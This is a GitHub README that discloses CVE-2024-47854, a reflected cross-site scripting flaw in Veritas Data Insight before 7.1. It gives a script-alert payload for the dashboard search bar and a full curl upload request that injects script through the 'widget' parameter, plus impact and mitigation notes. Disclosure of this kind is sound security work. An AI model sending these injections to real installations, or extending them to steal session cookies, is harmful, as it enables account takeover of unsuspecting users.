Skip to content
/ CVE-2024-47854 Public

Proof of concept of multiple Reflected Cross-Site Scripting (XSS) vulnerabilities discovered in Veritas Data Insight before 7.1.

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

MarioTesoro/CVE-2024-47854

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
README.md
README.md
 
 

Repository files navigation

CVE-2024-47854

Severity : Medium (6.1)

CVSS score : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Summary :

An Reflected Cross-Site Scripting (XSS) vulnerability was discovered in Veritas Data Insight before 7.1. It allows a remote attacker to inject an arbitrary web script into an HTTP request that could reflect back to an authenticated user without sanitization if executed by that user.

There are 2 possible injections:

Poc 1

Steps to Reproduce :

  1. Insert the following payload inside the searchbar of the page https://<your_data_insight_fqdn>/#!/dashboardview
<script>alert(1)</script>
  1. An orange popup will reflect the html/js injected.

Poc 2

Steps to Reproduce :

  1. Log in into the app then perform the file upload as shown with curl (replace host and cookie) at https://<your_data_insight_fqdn>/upload?key=reports&widget=%3CscrIpt%3Ealert%2 81%29%3B%3C%2FscRipt%3E
curl -i -s -k -X $'POST' \
-H $'host: <your_data_insight_host>' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64;
rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-
Language: en-US,en;q=0.5' -H $'Content-Type: multipart/form-data; boundary=---------------------------
20101797902913131172305294003' -H $'Content-Length: 239' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-
Dest: iframe' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' \
-b <your_cookie> \
--data-binary $'-----------------------------20101797902913131172305294003\x0d\x0aContent-
Disposition: form-data; name=\"file_upload\"; filename=\"test.csv\"\x0d\x0aContent-
Type: text/csv\x0d\x0a\x0d\x0atest\x0d\x0a\x0d\x0a-----------------------------
20101797902913131172305294003--' \
$'https://<your_data_insight_host>/upload?key=reports&widget=%3CscrIpt%3Ealert%2
81%29%3B%3C%2FscRipt%3E'
  1. The response will contain:
<scrIpt>alert(1);</scRipt>

Affected Version Details :

  • <=7.1

Impact :

The attacker can use social engineering techniques to make the victim click on a crafted malicious url in order to exfiltrate data or install malware on the user’s machine. Attackers can steal cookies and masquerade as authorized, allowing them to perform any action allowed by the user account.

Mitigation :

  • Implement input sanitization and/or implement html entities encoding

References :

About

Proof of concept of multiple Reflected Cross-Site Scripting (XSS) vulnerabilities discovered in Veritas Data Insight before 7.1.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published